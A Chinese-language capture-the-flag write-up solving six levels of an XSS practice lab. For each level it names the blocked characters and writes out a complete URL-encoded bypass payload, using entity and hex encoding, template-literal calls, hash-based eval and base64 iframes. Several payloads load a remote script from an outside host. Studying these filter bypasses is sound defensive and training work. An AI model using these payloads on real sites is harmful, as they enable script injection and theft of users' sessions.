感謝大佬的靶場和思路,pdf:xss修煉之獨孤九劍.pdf
奇怪的xss姿勢增加了.jpg
0x01 第一式
提示過濾了=()
思路:在<svg>標簽中的<sciprt>標簽可以執(zhí)行html編碼
alert(1) 對應的html實體編碼為:alert(1)
最后payload為:
"><svg><script>alert(1)</script></svg>
將其url編碼一下,得到:http://xcao.vip/test/xss1.php?data="><svg><script>%26%23x61%3b%26%23x6C%3b%26%23x65%3b%26%23x72%3b%26%23x74%3b%26%23x28%3b%26%23x31%3b%26%23x29%3b<%2fscript><%2fsvg>觸發(fā)xss
接下來加載alert.js,我們可以將需要執(zhí)行的js代碼藏在url的#號后面
然后使用 location.hash獲取 #+#號后面的內容
location.hash.slice(1)去除#號,再用eval(location.hash.slice(1))執(zhí)行屯仗,
eval(location.hash.slice(1))對應的html實體編碼為:eval(location.hash.slice(1))
最終payload1:http://xcao.vip/test/xss1.php?data="><svg><script>%26%23x65%3b%26%23x76%3b%26%23x61%3b%26%23x6c%3b%26%23x28%3b%26%23x6c%3b%26%23x6f%3b%26%23x63%3b%26%23x61%3b%26%23x74%3b%26%23x69%3b%26%23x6f%3b%26%23x6e%3b%26%23x2e%3b%26%23x68%3b%26%23x61%3b%26%23x73%3b%26%23x68%3b%26%23x2e%3b%26%23x73%3b%26%23x6c%3b%26%23x69%3b%26%23x63%3b%26%23x65%3b%26%23x28%3b%26%23x31%3b%26%23x29%3b%26%23x29%3b<%2fscript><%2fsvg>#with(document)body.appendChild(createElement('script')).src='http://xcao.vip/xss/alert.js'最終payload2:
http://xcao.vip/test/xss1.php?data=%22%3E%3Cscript%3Eeval.call`${location[%27hash%27][%27slice%27]`1`}`%3C/script%3E#with(document)body.appendChild(createElement('script')).src='http://xcao.vip/xss/alert.js'
0x02 第二式
提示過濾了=().
第一式的第一種解法可以使用在es6語法中``是可以代替括號使用的
因此可以使用setTimeout函數(shù)去觸發(fā)代碼 setTimeout`代碼`
同時可以將代碼編碼成\uXXXX或者\xXX格式繞過限制
將eval(location.hash.slice(1))進行\xXX格式的編碼
最終payload:http://xcao.vip/test/xss2.php?data=%22%3E%3Cscript%3EsetTimeout`\x65\x76\x61\x6C\x28\x6C\x6F\x63\x61\x74\x69\x6F\x6E\x2E\x68\x61\x73\x68\x2E\x73\x6C\x69\x63\x65\x28\x31\x29\x29`%3C/script%3E#with(document)body.appendChild(createElement('script')).src='http://xcao.vip/xss/alert.js'
0x03 第三式
過濾了().&#\,開放了=號
開放了等于號直接使用<script src='http://xcao.vip/xss/alert.js'></script>
這里還過濾了.號,直接二次編碼為%252e完事
最終payload:http://xcao.vip/test/xss3.php?data=%22%3E%3Cscript%20src=%27http://xcao%252evip/xss/alert%252ejs%27%3E%3C/script%3E
0x04 第四式
過濾了=().&#\
大佬的思路是用 url編碼+javasjcript偽協(xié)議 繞過過濾
document.location.assign再用location['assign'](location['replace']也可以)表示橘沥,然后再給javascript偽協(xié)議再套一層eval函數(shù)
最終payload為:http://xcao.vip/test/xss4.php?data=%22%3E%3Cscript%3Elocation[%27assign%27]`javascript:eval%2528eval%2528location%252ehash%252eslice%25281%2529%2529%2529`%3C/script%3E#with(document)body.appendChild(createElement('script')).src='http://xcao.vip/xss/alert.js'
0x05 第五式
過濾了().&#\%
大佬的思路是借助十進制ip,繞過.號
其實還可以利用iframe標簽加base64編碼http://xcao.vip/test/xss5.php?data=1%22%3E%3Cscript%3Etop[%22document%22][%22write%22]`${%22data:text/html;base64,PHNjcmlwdCBzcmM9aHR0cDovL3hjYW8udmlwL3hzcy9hbGVydC5qcz48L3NjcmlwdD4=%3Etest%3C/iframe%3E%22}%20%3Ciframe%20src=`%3C/script%3E
0x06 第六式
過濾了=().&#\%
在第五式的基礎上使用top['String']['fromCharCode']`61`代替等號
最終payload:http://xcao.vip/test/xss6.php?data=1%22%3E%3Cscript%3Etop[%22document%22][%22write%22]`${top[%22String%22][%22fromCharCode%22]`61`%2b%22data:text/html;base64,PHNjcmlwdCBzcmM9aHR0cDovL3hjYW8udmlwL3hzcy9hbGVydC5qcz48L3NjcmlwdD4=%3E111%3C/iframe%3E%22}%20%3Ciframe%20src`%3C/script%3E%http://xcao.vip/test/xss6.php/?data=%22%3E%3Cscript%3Edocument[%22write%22]`${location[%27hash%27][%27slice%27]`1`}%3Cimg%20`%3C/script%3E#src='x'onerror=with(document)body.appendChild(createElement('script')).src='http://xcao.vip/test/alert.js'//
剩下的七八九式就不玩了夯秃,不得不說大佬們tql
